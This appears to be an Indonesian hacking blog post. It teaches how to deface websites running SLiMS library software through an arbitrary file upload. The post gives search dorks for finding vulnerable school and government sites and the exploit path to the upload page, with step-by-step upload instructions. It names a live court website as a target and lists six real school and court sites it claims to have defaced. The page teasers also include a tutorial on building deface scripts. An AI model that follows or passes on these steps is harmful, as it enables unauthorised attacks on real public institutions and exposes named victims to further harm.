Deface Poc Slims Arbitari File Upload

-

 Ok balik lagi dengan gw disini kali ini gw akan memberikan tutorial deface metode Slims Arbitari File Upload+Live Target

Ok langsung aja ketutorial nya

Dork=>

inurl''/index.php?select_lang='' site:sch.id

Powered by SLiMS site:id

Exploit=>

/admin/modules/bibliography/pop_attach.php

Akses File=>repository/sc kalian.txt

Live Target=>

http://pn-tapaktuan.go.id/pustaka/


Pertama² kalian ngedork dulu:V seperti gambar di bawah ini:V



Lalu pilih salah satu website nya dan disini gw udh punya live target jadi tinggal kasih masuk Exploit nya aja seperti ini:V



Jika udh kalian masukkan Exploit maka tampilan nya akan seperti ini:V




Nah untuk bagian judul kalian isi terserah selera kalian dan bagian pilih file kalian pilih SC depes kalian berbentuk txt



Jika udh kalian klik unggah sekarang setelah itu kalian akses file kalian dengan cara repository/SC depes kalian.txt jika kurang paham liat gambar di bawah ini:V




Lalu kalian tekan enter and boom terdeface:V



Dan ini hasil saya:V

http://pn-tapaktuan.go.id/pustaka/repository/ft.txt

https://library.institutpendidikan.ac.id/repository/ft.txt

http://perpus.man2bantul.sch.id/repository/ft.txt

http://www.smkn1salatiga.sch.id/library/repository/ft.txt

http://pn-temanggung.go.id/perpustakaan/repository/ft.txt

http://pn-brebes.go.id/SLIMS/perpustakaan/repository/ft.txt


Ok itu saja dari saya kurang lebih nya saya minta maaf terimakasih

Komentar

Posting Komentar

Postingan populer dari blog ini

Belajar CTF Part 2

-
Gambar
  Ok gays kali ini gw akan memberikan tutorial belajar CTF Part 2 atau akan memberikan write up Ctf Dan kali ini gw akan membahas 3 CTF  Ok langsung aja kita mulai yang pertama 1.https://app.cybersidn.com/chall/17 (Crypto) Kalian buka dan pahami clue nya Disitu tertulis dua nama di jadikan satu dan ada pesan aneh( id2pNYh 303 EuL). Dan batang kayu lalu dia berkata 4 Disitu tertulis Sky dan Tale serta ada kata "4" dan kita pahami clue nya 2 nama di jadikan satu ,Nah yang di maksud disini 2 nama yaitu sky dan Tale di gabung jadi Skytale dan itu adalah salah satu jenis Cipher (CIPHER SKYTALE) OK langsung aja kita ke tutorial pemecahannya Kalian pergi ke tools Cipher Skytale (https://www.dcode.fr/chiffre-scytale) Kalian buka dan tampilan nya bakal seperti ini Kalian masukkan pesan aneh tersebut lalu kalian centang dan masukkan nomor 4 lalu klik menguraikan Skytale ,Kurang paham? Liat di gambar di atas Jika udh bakal nemuin  flag nya yaitu ( iN3EdY0u2h3Lp) Nah udh Nemu flag ny...
Baca selengkapnya

Belajar CTF Part 3

-
Gambar
 Assalamualaikum perkenalkan nama gw Arman1337 Kali ini gw akan memberikan write up sebuah ctf  site:http://ctf-gabut1337.22web.org/IGS.php Langsung aja kita ke tutorialnya 1.Pertama kita cari Kode qr yang berisi kunci untuk membuka Stegano nya 2.Dan disitu udh ada sebuah alamat url ( http://ctf-gabut1337.22web.org/igs/) 3.Dan jika kalian buka akan terjadi 403 Forbidden ,Lalu bagaimana cara melewatkan nya? 4.Kalian tinggal view source dan akan mendapatkan <!----team-----> kalian tambahkan di belakang igs  5.Jadi seperti ini (http://ctf-gabut1337.22web.org/igs/team),Dan jika kalian buka maka tampilan nya 404 Not Found 6.Lalu bagaimana Cara Melewatkan nya? kalian tinggal view-soure saja dan akan mendapatkan <!-codeqr.png--> 7.Kalian tambahkan di belakang team jadi seperti ini (http://ctf-gabut1337.22web.org/igs/team/codeqr.png ) 8.Kalian unduh gambar nya dan kalian decode code qr 9.Dan kalian akan mendapatkan ini (https://ghostbin.co/ CZ9J6 R4W P45T3 nah itu k...
Baca selengkapnya

Cara menambahkan gambar di script deface

-
Gambar
Assalamualaikum Nama saya  Fharel guchi, kali ini saya akan memberikan tutorial "Menambahkan gambar di script deface" Tutorial ini cocok untuk defacer pemula, yang ingin belajar  ini mentahan codingnya : <img src="(link gambar)width="300px" height="300px"></img> 1. kalian pilih gambar mana yang mau di taro di script deface 2. buka link imgbb.com, dan upload gambarnya click tulisan "Upload, dan upload gambarnya". kalo udh di upload gambarnya, click gambar yang saya kasih tanda kotak warna hijau Dan click lagi gambar  yang saya isi tanda kotak  warna biru kalo sudah click gambar yang tadi, silahkan copy linknya oke guys, dan ini linknya  https://i.ibb.co/kV7xJ0R/F7396747-BBE4-4538-B309-426-B03354-CDD.jpg udah sama, Ekstensi fotonya hrs .jpg  <img src=" https://i.ibb.co/kV7xJ0R/F7396747-BBE4-4538-B309-426-B03354-CDD.jpg "width="300px" height="300px"></img> dan setelah itu buka apk edit html ...
Baca selengkapnya